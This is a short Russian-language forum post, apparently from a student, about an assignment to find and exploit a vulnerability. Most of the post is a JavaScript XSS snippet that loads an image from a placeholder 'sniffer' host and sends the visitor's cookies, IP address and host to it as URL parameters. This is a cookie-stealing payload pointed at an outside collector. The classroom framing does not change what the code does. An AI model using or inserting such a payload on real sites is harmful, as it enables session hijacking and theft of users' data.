и соответственно задал С/Р в 2 вариантах:
- Найти и использовать уязвимость
- Предложить свой метод решения проблемы
Ну и как известно ломать и т.д. все горазды...
не долго думая на паре намалевал xss и скрипт сниффера (что-то типа этого):
CODE (javascript):
скопировать код в буфер обмена
скопировать код в буфер обмена
- <script language="javascript">
- var img=new Image();
- img.src="http://(адрес сниффера).dom/?c=" + (функция аля куки) + "&ip=" + (функция аля IP) + "&h=" + (функция аля хост);
- </script>